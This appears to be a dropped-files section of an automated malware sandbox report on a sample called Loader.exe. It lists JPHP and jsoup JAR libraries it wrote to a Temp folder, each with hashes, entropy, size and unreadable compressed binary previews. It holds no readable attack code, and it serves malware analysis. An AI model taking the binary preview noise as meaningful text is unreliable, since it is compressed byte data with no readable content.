                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.823795646704166
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:CPj4aLCBcnn4xGrpR7H30x4VTNVNM43QHt0msLiWzO5SQJn4494m75CYl3U:ETCBmnoCptBNNVNzQ6e5SQW494mlZ2
                                                                                                                                                                                                                                                                                                              MD5:0C8768CDEB3E894798F80465E0219C05
                                                                                                                                                                                                                                                                                                              SHA1:C4DA07AC93E4E547748ECC26B633D3DB5B81CE47
                                                                                                                                                                                                                                                                                                              SHA-256:15F36830124FC7389E312CF228B952024A8CE8601BF5C4DF806BC395D47DB669
                                                                                                                                                                                                                                                                                                              SHA-512:35DB507A3918093B529547E991AB6C1643A96258FC95BA1EA7665FF762B0B8ABB1EF732B3854663A947EFFE505BE667BD2609FFCCCB6409A66DF605F971DA106
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........3.\K................META-INF/..PK........3.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........3.\K.................packages/..PK........3.\KpS..v............packages/framework.pkg.W.n.8.}....}..,.:m....c3.&.(Hr;....k..V..h.sH../.\..h... w.T6j....k.o..;L.....dBR.{/.I.P.t.H.:s...X.......#...-..CPm.....lT;..u........P..o.L.j..a.h...@.@..6`J....D9..IfT..U....d.B.]..........T.<.......nfs..k....P`..,..g........T[+@.em.cY...F.k.h..T.M.1....{.eg@+Q.._a.....(O.Z..y.UPu....;.M.......8O..d$....)...MlMc/..;.|....N.(.s.......1.c.n..... T+..._.g*@R9.. ...F...../...lg..>.....W...J.6.<.VT..iY.l....}......M.J.?.........YS....H.9rG.I.;....ZK...d'|....Ix....c.....ve._s......JOu..s....Z...)g........j.K.W.7.o .^....:!m...n...........*9Q'..8.<..3!.\.8.j...z.mn.....6.....].N/...x]..Ke....:.A.Z.......l..AaG3~..y.K8R..<#J?..P..._..k.H........ .]L8.......j......lYq..).......(.hCf...$$..l.....K...M3...Ll9....-.1.%.......v.....m...

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-core.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):475905
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.8713354167151675
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:pyfuv+DnikW2IfqFXKzNGNyyRmfD4vCgdiRST:pLWDnid2IfZGAyAfczdig
                                                                                                                                                                                                                                                                                                              MD5:7E5E3D6D352025BD7F093C2D7F9B21AB
                                                                                                                                                                                                                                                                                                              SHA1:AD9BFC2C3D70C574D34A752C5D0EBCC43A046C57
                                                                                                                                                                                                                                                                                                              SHA-256:5B37E8FF2850A4CBB02F9F02391E9F07285B4E0667F7E4B2D4515B78E699735A
                                                                                                                                                                                                                                                                                                              SHA-512:C19C29F8AD8B6BEB3EED40AB7DC343468A4CA75D49F1D0D4EA0B4A5CEE33F745893FBA764D35C8BD157F7842268E0716B1EB4B8B26DCF888FB3B3F4314844AAD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK..........[K................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK..........[K................org/..PK..........[K................org/develnext/..PK..........[K................org/develnext/jphp/..PK..........[K................org/develnext/jphp/core/..PK..........[K................org/develnext/jphp/core/common/..PK..........[K0:..).......G...org/develnext/jphp/core/common/ObjectSizeCalculator$ObjectWrapper.class.RMo.@.}k;q.\....o.$....F.@.*".p.*.'6.*qp.`;.EH........%.$...q...B.V..r.....{o.....o...* ..yh8"..:..p.'u.b....pb.rk...q.g.H.K...._f.....1h..+.f[./........OH......]Y.....af..V.G#.2.M..a..Q$..h.a..u...~l.F......0..~..v........ \..)..{c.E..~.A...K;...U>J-..<.o..VkM.,..Fi...CG.....^..I%.y,..3p.gt.e...#....d(..'.J?#..q.E..jmj....\...;...Q,...]..n.qm{[{.............T..(P.G.......3.i}..*....t.xD...'..ja.6.J@.IV.?(c..|.r.....6.~..>A-ko.Q'..(.whtlB..AS'./#..P|J..1?... ....mRWj.S.CF7X.t.......I)[/..T...ze.k.WT..,.L.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-desktop-ext.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):17374
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.682654493549437
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Paj1PXNyyQwsCxm7VXh3il27I8pdo63XNrqlY3ylWn4iczt3Z:e1/BQwsCxIVXhuF8pKaXNdXn4icz9Z
                                                                                                                                                                                                                                                                                                              MD5:B50E2C75F5F0E1094E997DE8A2A2D0CA
                                                                                                                                                                                                                                                                                                              SHA1:D789EB689C091536EA6A01764BADA387841264CB
                                                                                                                                                                                                                                                                                                              SHA-256:CF4068EBB5ECD47ADEC92AFBA943AEA4EB2FEE40871330D064B69770CCCB9E23
                                                                                                                                                                                                                                                                                                              SHA-512:57D8AC613805EDADA6AEBA7B55417FD7D41C93913C56C4C2C1A8E8A28BBB7A05AADE6E02B70A798A078DC3C747967DA242C6922B342209874F3CAF7312670CB0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........3.\K................META-INF/..PK........3.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........3.\K................org/..PK........3.\K................org/develnext/..PK........3.\K................org/develnext/jphp/..PK........3.\K................org/develnext/jphp/ext/..PK........3.\K................org/develnext/jphp/ext/gui/..PK........3.\K............#...org/develnext/jphp/ext/gui/desktop/..PK........3.\K............+...org/develnext/jphp/ext/gui/desktop/classes/..PK........3.\K.|wk.......6...org/develnext/jphp/ext/gui/desktop/classes/Mouse.class.SmO.A.~...^O....J..P..QQ.."&M*.0|2!.c)...n..../&F.....(..-.A..}f.yff......2..0e.&.m.B!....ha..<C.#..~..P....0VZ.+T.]W....&.^.r.b.....r.|.E....m..Z.+...R...V..k^.......<.....z_F.K. ....!|%..{`.Q.%..[..].(..}..XeHQ........h...S.i.!....*.a.i.(..F6..m.I...R...Yp.2[....C..))%.f...]..Mt7..Sm6...D.D......'.K3);i{.7..ER..5..'N'..73ip?&^.hoZ.up.....,.e.wq..}.W..`.+..g.%....|...S.....*......&t.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-gui-ext.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):704689
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.834558665203789
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:sSn9gd/GXLtKb+Ozu5idmEfcHOPJZ7bw1kXn0yZLJZsDDpJSWB5qSEhQ:sMw/GXUb+euCVIOxRQIZOnuK
                                                                                                                                                                                                                                                                                                              MD5:6696368A09C7F8FED4EA92C4E5238CEE
                                                                                                                                                                                                                                                                                                              SHA1:F89C282E557D1207AFD7158B82721C3D425736A7
                                                                                                                                                                                                                                                                                                              SHA-256:C25D7A7B8F0715729BCCB817E345F0FDD668DD4799C8DAB1A4DB3D6A37E7E3E4
                                                                                                                                                                                                                                                                                                              SHA-512:0AB24F07F956E3CDCD9D09C3AA4677FF60B70D7A48E7179A02E4FF9C0D2C7A1FC51624C3C8A5D892644E9F36F84F7AAF4AA6D2C9E1C291C88B3CFF7568D54F76
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........gt]K................META-INF/..PK........0.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK......../.\K................org/..PK......../.\K................org/develnext/..PK......../.\K................org/develnext/jphp/..PK......../.\K................org/develnext/jphp/ext/..PK........gt]K................org/develnext/jphp/ext/javafx/..PK........gt]K............#...org/develnext/jphp/ext/javafx/bind/..PK........gt]K....V.......>...org/develnext/jphp/ext/javafx/bind/BoundsMemoryOperation.class.V[W.U..N..a....B[.Z...h-.....E.h.-.j..$.Hf..$....|...P}.k.e.k..\.33..&..b......g_f.....K.w..a.3.f..).W.0.va._(.R.....).5.......$.Z.#).*V.\U.&..)S*6.|....V..$.S..0.cKAZA..s.-1.......3N.3.IX6_.....bn.h%.p.fa.t-....[e........k....K...U3[3.,;c<p*v......\.),.`8..g.f...|,.8!.......:.w%..m..K./.0..."+%..U...l,!..Vla....1gW-.....ol..f./.Y.....x".(."..^.....i.k'zc.........e.9.@..0hs.4/.\...UW..?.m.X..%..O.s...N..S..{....0.;.f).owu.....yZ...[.h....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-gui-jfoenix-ext.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):52081
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.732227829944057
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:1shuTqhiMtf/2PXkXgjYcO1556i/canPH1y3F95grf5CjdKBfn602ZhqsNgsSJ+y:nw1pywCjUfnX
                                                                                                                                                                                                                                                                                                              MD5:D093F94C050D5900795DE8149CB84817
                                                                                                                                                                                                                                                                                                              SHA1:54058DDA5C9E66A22074590072C8A48559BBA1FB
                                                                                                                                                                                                                                                                                                              SHA-256:4BEC0794A0D69DEBE2F955BF495EA7C0858AD84CB0D2D549CACB82E70C060CBA
                                                                                                                                                                                                                                                                                                              SHA-512:3FAAA415FBA5745298981014D0042E8E01850FCCAAC22F92469765FD8C56B920DA877FF3138A629242D9C52E270E7E2CE89E7C69F6902859F48EA0359842E2FB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........0.\K................META-INF/..PK........0.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........0.\K................org/..PK........0.\K................org/develnext/..PK........0.\K................org/develnext/jphp/..PK........0.\K................org/develnext/jphp/ext/..PK........0.\K................org/develnext/jphp/ext/javafx/..PK........0.\K............&...org/develnext/jphp/ext/javafx/jfoenix/..PK........0.\K................org/develnext/jphp/ext/javafx/jfoenix/classes/..PK........0.\K....I.......U...org/develnext/jphp/ext/javafx/jfoenix/classes/UXMaterialButton$WrappedInterface.class.P]K.A.=S.Y..=..DF5/......a...:k..3..(..z.....Y.."Jh...r........S.(V(V.r.1J>.BA.n.....kR.}..(....A....]%.7d..F. b7.V2V.N....}i..x."...K)...S2.(.d...6#..z..2.....YS..p....s....Q..+....Fh.......8.&AC.........G.%.... .....y..NM...{..C+.........X.-....E.Mp8......"..]...r.....GR...g,J.h....d;..e........@n?ky.(.3.PK........0.\KMU..........D...org/develn

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-json-ext.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):17135
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.7352982443766
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:fSw3uFslDvQGOoqdoUFKgvXj9jmHo5+FejOcEDffWPvy:KwJlrQGOdoUFKgvTmn6y
                                                                                                                                                                                                                                                                                                              MD5:FDE38932B12FC063451AF6613D4470CC
                                                                                                                                                                                                                                                                                                              SHA1:BC08C114681A3AFC05FB8C0470776C3EAE2EEFEB
                                                                                                                                                                                                                                                                                                              SHA-256:9967EA3C3D1AEE8DB5A723F714FBA38D2FC26D8553435AB0E1D4E123CD211830
                                                                                                                                                                                                                                                                                                              SHA-512:0F211F81101CED5FFF466F2AAB0E6C807BB18B23BC4928FE664C60653C99FA81B34EDF5835FCC3AFFB34B0DF1FA61C73A621DF41355E4D82131F94FCC0B0E839
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........K.\K................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK..........[K................org/..PK..........[K................org/develnext/..PK..........[K................org/develnext/jphp/..PK........K.\K................org/develnext/jphp/json/..PK........K.\K............ ...org/develnext/jphp/json/classes/..PK........K.\K........5...5...org/develnext/jphp/json/classes/JsonProcessor$1.class..[S.@.....B..E.^.A..\B.C..Uf..":.8!Y.t..$...|.M?./:.....x...C.H3._.....nv......,6...(C"..$.R.c.......*..C.a.a.a.a.a.a.a.a.a.!.eXaXU.5m.?..H.1....i...r..v`.%.wt...Y...#^.t...6.9Ks]N.t..E......O-.......%..M^.G...tFA[.,....../k..{.....U..e.....d..kq.o{f....jf.......o.A..M..P.Om.r\..ns....k1..]._...c.+.;...u.,)R...u...6.!-.Q...h_.C....(,..O..!.M.r...;.... ....io.)^....5*".F!6L[..Fe.J....C..yuO....H............#.uE..}..;.W.\,..5rn=.|&......#<...C..Z..Ok...T..r".L\).]1.a(.J.9..[.$.1E.Y/j?.^:..{4.@S`....%.o...

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-jsoup-ext.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20103
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.62878564707382
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:LbCDj5HBuJXm9XPDUbrXywgqYw6QENTQxS76lXtz2MQHZg6+Cr:L+D/MXADerZgfwcQi6lXtz2MQHZg6+Cr
                                                                                                                                                                                                                                                                                                              MD5:D963210C02CD1825E967086827DA8294
                                                                                                                                                                                                                                                                                                              SHA1:26C4D004B5FFDB8F81DE2D6B158A3F34819FAF01
                                                                                                                                                                                                                                                                                                              SHA-256:7908145CF17301BEDEFD6E3AF8C93E0320582C0562919FFB56CC21B7FD532B96
                                                                                                                                                                                                                                                                                                              SHA-512:756C21DC1A02D579F0E2ED39E5BEDCA5491087CDC28E3E96C8663A493BCFEEEEEA44DC40681EC6341426DFA995883DBCE11B76D1F921E043AE220399A9E554FB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK.........tVK................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........ukVK................org/..PK........ukVK................org/develnext/..PK........ukVK................org/develnext/jphp/..PK........ukVK................org/develnext/jphp/ext/..PK........ukVK................org/develnext/jphp/ext/jsoup/..PK........ukVK............"...org/develnext/jphp/ext/jsoup/bind/..PK........ukVK...3........=...org/develnext/jphp/ext/jsoup/bind/BinaryMemoryOperation.class..kO.A...-K..KE.\...... b+.ELL.h $._..]..6....J..D..?.xfw.RJ.h...9..3.?~~..`.k*"H).U0.b.i....,...C.*...%....YC...C ..a...{.a(o.........d...^..-C.}c.....i..=..U..m.^.k.a:u.h.=-g..:z.k.u.Y.n...0\-s.d.^...N..D..?..V.EYs....2.B.....]\..5.RJ.hr.fx...X.....hj..iX..qag.mn[z......-..d!......|:....0.C..PsE......... 5.<&.#..5..dw.P....w~..0.&h.x.Kv.........g<.pk..^7-[.(.l!'+I.2..._......T.".+.5..`%.'XU.4.....]....gQ..(...r..bH..m..OO.]...^{..H...u..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-runtime.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1177648
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.91949701328009
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24576:cP4MBZrpGi4exQ9qdXVd/F/3yy7mgviLzIM:czHMi4eKCd/BzaLcM
                                                                                                                                                                                                                                                                                                              MD5:D5EF47C915BEF65A63D364F5CF7CD467
                                                                                                                                                                                                                                                                                                              SHA1:F711F3846E144DDDBFB31597C0C165BA8ADF8D6B
                                                                                                                                                                                                                                                                                                              SHA-256:9C287472408857301594F8F7BDA108457F6FDAE6E25C87EC88DBF3012E5A98B6
                                                                                                                                                                                                                                                                                                              SHA-512:04AEB956BFCD3BD23B540F9AD2D4110BB2FFD25FE899152C4B2E782DAA23A676DF9507078ECF1BFC409DDFBE2858AB4C4C324F431E45D8234E13905EB192BAE8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK..........\K................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK..........[K................php/..PK..........\K................php/runtime/..PK..........\K................php/runtime/annotation/..PK..........\K.~..........0...php/runtime/annotation/Reflection$Abstract.class.PMK.@...W.Xm...b...s..h..%FA<m..l7!....<...Q.[D.P....y..........8h:.u.'.>..4..H.@.WE..b}>..)p...f..e.XQW..H.g..;....O...O..E...Ts6n...b..Knp....?....n.d:!....|O.=.eB,*..#...z......@'yK..'..]~..u.Ieh..9.....J.,#.....S....._&p.vv[@....{.(q-....-F.sUB..6,|A.P.-[.a.....v...PK..........\K.RG=........+...php/runtime/annotation/Reflection$Arg.class.S[SRQ......./].L-%..X.[N..M.8........l.a....C?........p8k}.Z....?~.x...v-.-....W.`X..x...].<..o..JZ.....?...U.....6.W....=.....;P....P$.....:.-a..5.*.J8..N.z........1......m.e}...Z..Y.N...6...N.2..\4.CZS..Q..,..*......*W...i"S5.$...........Qz.r...Cf(. .fo....dZ.lH.M\.q?`.............vh

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-xml-ext.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20151
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.765220504812666
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:dti5BMxSo4LgAAsJilYcmwPbEM0Av7wGkJXbhS1OaVKD6U2:DqoCgqyIMZwRJLQO5eU2
                                                                                                                                                                                                                                                                                                              MD5:0A79304556A1289AA9E6213F574F3B08
                                                                                                                                                                                                                                                                                                              SHA1:7EE3BDE3B1777BF65D4F62CE33295556223A26CD
                                                                                                                                                                                                                                                                                                              SHA-256:434E57FFFC7DF0B725C1D95CABAFDCDB83858CCB3E5E728A74D3CF33A0CA9C79
                                                                                                                                                                                                                                                                                                              SHA-512:1560703D0C162D73C99CEF9E8DDC050362E45209CC8DEA6A34A49E2B6F99AAE462EAE27BA026BDB29433952B6696896BB96998A0F6AC0A3C1DBBB2F6EBC26A7E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK.........tVK................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........wkVK................org/..PK........wkVK................org/develnext/..PK........wkVK................org/develnext/jphp/..PK........wkVK................org/develnext/jphp/ext/..PK........wkVK................org/develnext/jphp/ext/xml/..PK........wkVK............#...org/develnext/jphp/ext/xml/classes/..PK........wkVKmw.>........@...org/develnext/jphp/ext/xml/classes/WrapDomDocument$Methods.class.R]S.@.=......R...!y!3.}..L...;".5.iS...f..O.....r.l...f$.9{..~.....'.W.q...9...}.NS.U/a...y......e.D".,.%h.pk....|.`BOh.P>..J.|.N...>...C..H...4./....E\.t....M.g..<...|..yC..`...1..k;.l.Vu.u..+.P...ro....N~...g..>..#..X.%...U.........n.fB.C..yw.KQ..;.g}..4..UmW.*E.d...T..P.|....Li..g..2..........8.5.%..Ez..[dw.M.H....pv..I6..p.&A..<gypE......r...i..9.{.@?...?|..Pw.........U.s..h...A....,..cp.K........W,...m..cp...........c<.....cK..;$x.....PK........w

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-zend-ext.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):97358
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9345189846943915
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:yZwgOueuKZ4THgWvLnhgmmJFgVn+nhEA1ODIrSrUricEDMrV+LAB:yZwgwuKmTDFgmmoVn+mAUhrUicRoAB
                                                                                                                                                                                                                                                                                                              MD5:4BC2AEA7281E27BC91566377D0ED1897
                                                                                                                                                                                                                                                                                                              SHA1:D02D897E8A8ACA58E3635C009A16D595A5649D44
                                                                                                                                                                                                                                                                                                              SHA-256:4AEF566BBF3F0B56769A0C45275EBBF7894E9DDB54430C9DB2874124B7CEA288
                                                                                                                                                                                                                                                                                                              SHA-512:DA35BB2F67BCA7527DC94E5A99A162180B2701DDCA2C688D9E0BE69876ACA7C48F192D0F03D431CCD2D8EEC55E0E681322B4F15EBA4DB29EF5557316E8E51E10
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK.........tVK................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........bkVK................org/..PK........bkVK................org/develnext/..PK........bkVK................org/develnext/jphp/..PK........bkVK................org/develnext/jphp/zend/..PK........ckVK................org/develnext/jphp/zend/ext/..PK........bkVK............!...org/develnext/jphp/zend/ext/json/..PK........bkVK.l.R........4...org/develnext/jphp/zend/ext/json/JsonConstants.class..]o.0......c]...k....!..@..u.4).[mWQ.F,S.Ti:!..K\!q...G!.M.^............;...j.2.8.O..@....dG.....A`...$......A...5..;B[.._.c.B......B`].u...[.J.D.,...f.A=.d..pv.lJ..h...t.s.cX.y...8?...b.g.[..Z.z..<...&..z....j...xiX..s...,...0J.\c..$PQ$..ym.m...x.;&.GwD....u.........".L .:.......~.@....f...tt.$.?..R6.?..I(x&f..pB...'..Ap....c...O.. .h.&q..p........O.~P.e..n..?..p....._a..E".Fi8.dh2...$...h..i..8I}.e.....C..YX....<....._F.*..|E.5.....zW..@.Tx.....+..@..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-zip-ext.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13213
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.627776815487544
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:yXmigootuYzXKKk6BL8UUJY0eP6nHY2AJ4qxivXRp2gFyjSonqKLRM7RbEZ:Km0WzX7k6eJB06HZYwRzFyj0uRM7RbEZ
                                                                                                                                                                                                                                                                                                              MD5:20F6F88989E806D23C29686B090F6190
                                                                                                                                                                                                                                                                                                              SHA1:1FDB9A66BB5CA587C05D3159829A8780BB66C87D
                                                                                                                                                                                                                                                                                                              SHA-256:9D5F06D539B91E98FD277FC01FD2F9AF6FEA58654E3B91098503B235A83ABB16
                                                                                                                                                                                                                                                                                                              SHA-512:2798BB1DD0AA121CD766BD5B47D256B1A528E9DB83ED61311FA685F669B7F60898118AE8C69D2A30D746AF362B810B133103CBE426E0293DD2111ACA1B41CCEA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........1.\K................META-INF/..PK........1.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........1.\K................org/..PK........1.\K................org/develnext/..PK........1.\K................org/develnext/jphp/..PK........1.\K................org/develnext/jphp/ext/..PK........1.\K................org/develnext/jphp/ext/zip/..PK........1.\K............#...org/develnext/jphp/ext/zip/classes/..PK........1.\K..tp....B...6...org/develnext/jphp/ext/zip/classes/PZipException.class.SMo.@.}...../Z.@.iC(.X.....B....*U.....6[.k.vL......B.:.JPER.ffg.}3+....'.....5k....l.f^k..7.W.n.D.7...P&....84.2i.=....4.b..._.Z...R;<T.9W.....T.ok.E7......d)......cq.2..u...{...:../.D%b...:...R.........I....../TMx7a..b..|.Y..m.u8.~.G/.......P...cO...v.{fu.V...].hV..0...8x.......Qq{.%..,.G..i.FVP....w;h..,"....S..pf.1....Q....2f..'<..#.....6....fD.CBs:...K.B.OD..".?.+..l.>ms...y...;.[........YT8Z..8.5.qP.*..,..h./.-.K.....i..S....{...8Z....wpo...-.X..4p

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jsoup.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):350645
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.923404487115684
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:C12HHimPXaabXTLqQt/ujrjUqGSEzZn/K0qeW79ix6vEF0FYqPfW:CCx3bXTGoGvJGSCtqeyIovECdPfW
                                                                                                                                                                                                                                                                                                              MD5:36145FEE38E79B81035787F1BE296A52
                                                                                                                                                                                                                                                                                                              SHA1:33EE82E324F4B1E40167F3DC5E01234A1C5CAB61
                                                                                                                                                                                                                                                                                                              SHA-256:6EBE6ABD7775C10A49407AE22DB45C840CD2CDAF715866A5B0B5AF70941C3F4A
                                                                                                                                                                                                                                                                                                              SHA-512:3B00B07320831F075A6AF9AC1863B8756FE4F99A1B4F2E53578DCA17FDAF7BDB147279225045E9EEEBA4898FE321CF5457832B8E6A1A5B71ACFF9A1C10392659
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK.........]"JWx2H............META-INF/MANIFEST.MF.T.N.0.}.....a.Rc...R..7-.v..,<..d.&v.vz...;%.Q.}K.s.....S46|Bm..}.Y.4.K.f.^.I.(..x1.,@..p..21.\o`.4..^.9...s...,Y..n....w...."E._"..%.(.J...;O.k.yb...).$.(3N<.r.[P..m.....j..?.-...[...$.0.....\..U..D^d.SP.).o/...{.]0.&b*........Iv.`....'G....\..%L.Z..!.........>.-L....`J...v.o."....?y....Rd6..P.....i8...UJR1....:..I..FQ...n.[....U..z...U.<.L.......[$3.....m8...H..M.I...U.....i.c..JCM..F..`f....3ci..+..8....J.1.....LX*.23...T/...............`YU.<f...f.xT*.i..........I|.......d..4...60IS`Zo.U..@.V6.h7.W....k7w`..n>..n..|..cV.~....$..../.[.abw[@2..s%..C.{c..0_fX.......<U.>i^.$..`/._..Y.R.....w....cg.....A.f.b.......!.s...FY9....ix......q.....PK..Wx2H........PK.........]"J................META-INF/PK.........]"J................org/PK.........]"J................org/jsoup/PK.........]"J................org/jsoup/examples/PK.........]"J................org/jsoup/helper/PK.........]"J................org/jsoup

